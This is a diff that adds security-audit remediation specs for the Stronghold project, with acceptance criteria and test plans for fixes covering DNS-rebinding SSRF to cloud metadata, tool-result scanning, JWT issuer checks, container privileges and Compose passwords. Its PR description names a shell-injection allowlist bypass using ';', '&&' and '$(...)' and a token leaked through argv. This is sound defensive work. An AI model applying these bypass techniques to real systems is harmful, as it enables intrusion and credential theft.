+IPs at connect time (not just at pre-check), so that DNS rebinding cannot
+redirect fetches to cloud-metadata endpoints or internal services.
+
+## Background
+
+`src/stronghold/api/routes/agents.py:370–461` calls
+`ip.is_private | is_loopback | is_link_local | is_reserved` at URL-parse
+time. The subsequent `httpx` request re-resolves DNS. An attacker
+controlling DNS for their domain can return a public IP during the check
+and a private IP (e.g., `169.254.169.254`) during the actual connect.
+
+## Acceptance Criteria
+
+- AC1: Given a hostname that resolves to a public IP at check time, When the HTTP connect happens, Then the resolved IP is re-checked and rejected if private/loopback/link-local/reserved.
+- AC2: Given an HTTP redirect response, When received, Then it is not followed (current behavior preserved with `follow_redirects=False`).
+- AC3: Given the response body exceeds `IMPORT_URL_MAX_BYTES` (default 1 MiB), When streaming, Then the fetch aborts with 413-equivalent error.
+- AC4: Given the fetch exceeds `IMPORT_URL_TIMEOUT_S` (default 10s), When running, Then it aborts with timeout error.
+- AC5: Given any step rejects the URL, When the handler returns, Then the response body does not echo the resolved IP (avoid leaking internal topology).
+
+## Test Mapping
+
+| AC  | Test path                              | Test function                              | Tier     |
+|-----|----------------------------------------|--------------------------------------------|----------|
+| AC1 | tests/api/test_agents_import_url.py    | test_dns_rebinding_rejected_at_connect     | critical |
+| AC2 | tests/api/test_agents_import_url.py    | test_redirect_not_followed                 | critical |
+| AC3 | tests/api/test_agents_import_url.py    | test_body_over_max_bytes_aborted           | critical |
+| AC4 | tests/api/test_agents_import_url.py    | test_fetch_timeout_enforced                | happy    |
+| AC5 | tests/api/test_agents_import_url.py    | test_error_body_does_not_leak_ip           | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/api/routes/agents.py` — after `httpx` resolves, inspect the underlying socket (`transport.get_extra_info("peername")`) or use an HTTP client that accepts a pre-resolved `(ip, port)` tuple and re-check.
+- Alternative: resolve DNS manually, pick a single public IP, pass `Host:` header + connect to IP (SNI needs `server_hostname`).
+- New: `tests/api/test_agents_import_url.py` — use `httpx.MockTransport` + an ephemeral DNS fake.
+
+## Rollback
+
+Single-file revert. Consider feature-flagging `STRONGHOLD_IMPORT_URL_STRICT_SSRF=1` for a canary window.

--- a/docs/security-reviews/specs/sec-h6-sentinel-fallback.md
+++ b/docs/security-reviews/specs/sec-h6-sentinel-fallback.md
@@ -1,0 +1,43 @@
+# SEC-H6: Route every tool-result scan through Sentinel
+
+## User Story
+
+As a **security auditor**, I want every tool-result scan to flow through
+the Sentinel post-call path, so that PII redaction and structured audit
+logging are never silently skipped when Sentinel is unconfigured.
+
+## Background
+
+`src/stronghold/agents/strategies/react.py` falls back to a direct Warden
+scan when `sentinel is None`, missing PII redaction and audit logging.
+Direct Warden calls also exist in `triggers.py` and `skills.py`. The
+Warden fallback is weaker than the Sentinel path by design, but it is
+reachable in default deployments where Sentinel has not been wired.
+
+## Acceptance Criteria
+
+- AC1: Given `sentinel is None`, When `ReactStrategy` processes a tool result, Then it instantiates a `NoopSentinel` that internally calls Warden + PII redactor, not a bespoke fallback.
+- AC2: Given `NoopSentinel.post_call` runs, When called, Then it emits the same audit-log event shape as the real Sentinel (with `sentinel_backend="noop"`).
+- AC3: Given a grep of `src/stronghold/`, When searching for direct `Warden.scan(...,  "tool_result")` calls outside `security/`, Then results are empty (enforced by a ruff custom rule or a test that greps the source tree).
+- AC4: Given an existing caller in `triggers.py` / `skills.py`, When migrated, Then behavior is unchanged on the happy path (no regressions in their test suites).
+
+## Test Mapping
+
+| AC  | Test path                                       | Test function                               | Tier     |
+|-----|-------------------------------------------------|---------------------------------------------|----------|
+| AC1 | tests/agents/test_react_strategy.py             | test_noop_sentinel_used_when_none           | critical |
+| AC2 | tests/security/test_noop_sentinel.py            | test_noop_sentinel_audit_shape              | critical |
+| AC3 | tests/security/test_no_direct_warden_calls.py   | test_no_direct_warden_tool_result_calls     | critical |
+| AC4 | tests/triggers/test_triggers.py                 | test_trigger_scan_unchanged_after_migration | happy    |
+
+## Files to Touch
+
+- New: `src/stronghold/security/sentinel/noop.py` — `NoopSentinel` wrapping Warden + redactor.
+- Modify: `src/stronghold/agents/strategies/react.py` — replace the fallback block with `sentinel or NoopSentinel(warden, redactor)`.
+- Modify: `src/stronghold/triggers.py`, `src/stronghold/skills.py` — route via sentinel.
+- Modify: `src/stronghold/container.py` — default `sentinel` to `NoopSentinel(...)` if none configured.
+- New: `tests/security/test_no_direct_warden_calls.py` — source-tree grep assertion.
+
+## Rollback
+
+Per-caller commits; if the noop introduces a regression, revert per-file.

--- a/docs/security-reviews/specs/sec-m2-demo-cookie-issuer.md
+++ b/docs/security-reviews/specs/sec-m2-demo-cookie-issuer.md
@@ -1,0 +1,41 @@
+# SEC-M2: Demo-cookie middleware must verify JWT `issuer`
+
+## User Story
+
+As a **security auditor**, I want the demo-cookie middleware to match the
+provider's JWT validation, so that tokens with a wrong `issuer` are
+rejected at the middleware layer instead of only at the provider layer.
+
+## Background
+
+`src/stronghold/api/middleware/demo_cookie.py:74–79` decodes the JWT with
+`audience="stronghold"` only. The provider at
+`src/stronghold/security/auth_demo_cookie.py:79` additionally validates
+`issuer="stronghold-demo"`. The provider re-checks downstream (so this is
+defense-in-depth overlap, not a bypass), but the middleware's
+pre-injection filter is weaker than the provider.
+
+## Acceptance Criteria
+
+- AC1: Given a cookie with a valid signature and audience but wrong `issuer`, When the middleware runs, Then no `Authorization` header is injected (request continues without auth).
+- AC2: Given a cookie with the correct issuer, When the middleware runs, Then the `Bearer demo-jwt:…` header is injected as today.
+- AC3: Given the middleware and provider share the same expected issuer constant, When one is updated, Then both update together (no drift).
+
+## Test Mapping
+
+| AC  | Test path                                     | Test function                              | Tier     |
+|-----|-----------------------------------------------|--------------------------------------------|----------|
+| AC1 | tests/api/test_demo_cookie_middleware.py      | test_wrong_issuer_not_injected             | critical |
+| AC2 | tests/api/test_demo_cookie_middleware.py      | test_correct_issuer_injected               | happy    |
+| AC3 | tests/api/test_demo_cookie_middleware.py      | test_issuer_constant_shared                | happy    |
+
+## Files to Touch
+
+- New: `src/stronghold/security/auth_demo_cookie.py` — export `DEMO_JWT_ISSUER = "stronghold-demo"` and `DEMO_JWT_AUDIENCE = "stronghold"` constants.
+- Modify: `src/stronghold/api/middleware/demo_cookie.py` — import and use both constants in `pyjwt.decode`.
+- Modify: `src/stronghold/security/auth_demo_cookie.py` — use the same constants.
+- New: `tests/api/test_demo_cookie_middleware.py`.
+
+## Rollback
+
+Trivial revert — tiny change.

--- a/docs/security-reviews/specs/sec-m4-dockerfile-nonroot.md
+++ b/docs/security-reviews/specs/sec-m4-dockerfile-nonroot.md
@@ -1,0 +1,45 @@
+# SEC-M4: Dockerfile runs as non-root with a locked-down `/workspace`
+
+## User Story
+
+As a **platform operator**, I want the Stronghold container to run as a
+non-root user with a non-world-writable `/workspace`, so that a process
+compromise does not grant root inside the container.
+
+## Background
+
+`Dockerfile:34` sets `chmod 777 /workspace` and has no `USER` directive,
+so the container runs as root.
+
+## Acceptance Criteria
+
+- AC1: Given the built image, When inspected, Then the final `USER` is non-root (`stronghold`, uid=1000).
+- AC2: Given the container runs, When `stat -c '%a' /workspace` is observed, Then the mode is `750`.
+- AC3: Given Mason's quality gates (`pytest`, `ruff`, `mypy`, `bandit`, `git`), When run by the non-root user inside `/workspace`, Then they succeed (CI proves this).
+- AC4: Given the container starts via `uvicorn`, When bound to `0.0.0.0:8100`, Then the bind succeeds (port is >1024, no CAP_NET_BIND required).
+
+## Test Mapping
+
+| AC  | Test path                                    | Test function                              | Tier     |
+|-----|----------------------------------------------|--------------------------------------------|----------|
+| AC1 | tests/deploy/test_dockerfile.py              | test_image_runs_as_nonroot                 | critical |
+| AC2 | tests/deploy/test_dockerfile.py              | test_workspace_mode_750                    | critical |
+| AC3 | `.github/workflows/ci.yml` (existing smoke)  | (runs Mason quality gates against image)   | e2e      |
+| AC4 | tests/deploy/test_dockerfile.py              | test_uvicorn_binds_8100                    | happy    |
+
+## Files to Touch
+
+- Modify: `Dockerfile`:
+  ```Dockerfile
+  RUN useradd -r -u 1000 -m stronghold \
+   && mkdir -p /workspace \
+   && chown stronghold:stronghold /workspace \
+   && chmod 750 /workspace
+  USER stronghold
+  ```
+- Modify: `deploy/` helm charts — ensure `securityContext.runAsNonRoot: true` already aligns.
+- New: `tests/deploy/test_dockerfile.py` — uses `docker inspect`/`docker run --rm` against built image; gate with `deploy` marker.
+
+## Rollback
+
+Single-commit Dockerfile revert. Verify Mason worktree creation still works in CI before release.

--- a/docs/security-reviews/specs/sec-m5-compose-password.md
+++ b/docs/security-reviews/specs/sec-m5-compose-password.md
@@ -1,0 +1,45 @@
+# SEC-M5: Parameterize Postgres credentials in `docker-compose.yml`
+
+## User Story
+
+As a **platform operator**, I want `docker-compose.yml` to fail fast when
+the Postgres password isn't set via env, so that the compose file cannot
+accidentally boot a production database with the string `stronghold` as
+the password.
+
+## Background
+
+`docker-compose.yml:40–42` hardcodes
+`POSTGRES_USER=stronghold / POSTGRES_PASSWORD=stronghold`, ignoring the
+`.env` file the header comment tells operators to edit. Docker Compose
+does not require env vars to be defined unless you use the `:?err`
+syntax.
+
+## Acceptance Criteria
+
+- AC1: Given `.env` does not set `POSTGRES_PASSWORD`, When `docker compose up` runs, Then compose exits with a clear error (uses `${POSTGRES_PASSWORD:?set POSTGRES_PASSWORD in .env}`).
+- AC2: Given `.env` sets `POSTGRES_PASSWORD=<anything>`, When `docker compose up` runs, Then both the `postgres` container and the `stronghold` service's `DATABASE_URL` use the same value.
+- AC3: Given the `.env.example`, When read, Then it lists `POSTGRES_PASSWORD=change-me` under a "REQUIRED" section.
+- AC4: Given any documentation referencing compose bootstrap, When updated, Then the instructions mention setting `POSTGRES_PASSWORD` before `compose up`.
+
+## Test Mapping
+
+| AC  | Test path                                 | Test function                             | Tier     |
+|-----|-------------------------------------------|-------------------------------------------|----------|
+| AC1 | tests/deploy/test_compose.py              | test_compose_fails_without_pg_password    | critical |
+| AC2 | tests/deploy/test_compose.py              | test_compose_env_propagates_to_services   | happy    |
+| AC3 | tests/deploy/test_compose.py              | test_env_example_documents_required_vars  | happy    |
+| AC4 | (manual doc review)                       | —                                         | —        |
+
+## Files to Touch
+
+- Modify: `docker-compose.yml` — `${POSTGRES_PASSWORD:?…}` in both the postgres `environment:` and the stronghold `DATABASE_URL`; same treatment for `POSTGRES_USER` and `POSTGRES_DB`.
+- Modify: `.env.example` — add REQUIRED section with `POSTGRES_PASSWORD`, `POSTGRES_USER`, `POSTGRES_DB`.
+- Modify: `README.md` / install docs — update bootstrap steps.
+- New: `tests/deploy/test_compose.py` — invokes `docker compose config` with and without the env set.
+
+## Rollback
+
+Revert the compose file if the fail-fast behavior breaks someone's
+scripted bootstrap. Low risk since the change is cosmetic for correctly
+configured deployments.


### PR DESCRIPTION
Findings across auth, API routes, Warden/Sentinel/Gate, tool execution, and
secrets/config. Three issues meeting the immediate-action bar:

- C-1 Shell injection in tools/shell_exec.py (create_subprocess_shell +
  prefix-only allowlist bypassable via ;, &&, $(...))
- C-2 GITHUB_TOKEN leaked through subprocess argv in tools/workspace.py
  (token embedded in git clone URL)
- H-1 Tool-policy fail-open on config error in container.py
  (missing Casbin files → tool_policy=None → gate skipped)

Plus seven High, seven Medium, and seven Low items. Composite auth is
fail-closed and PyJWT validation carries issuer/audience checks; Warden L1
regex has ReDoS timeouts; webhook HMAC is constant-time. Bandit MEDIUM hits
(B608) are false positives guarded by strict identifier allowlists.

Report only — no source changes in this commit.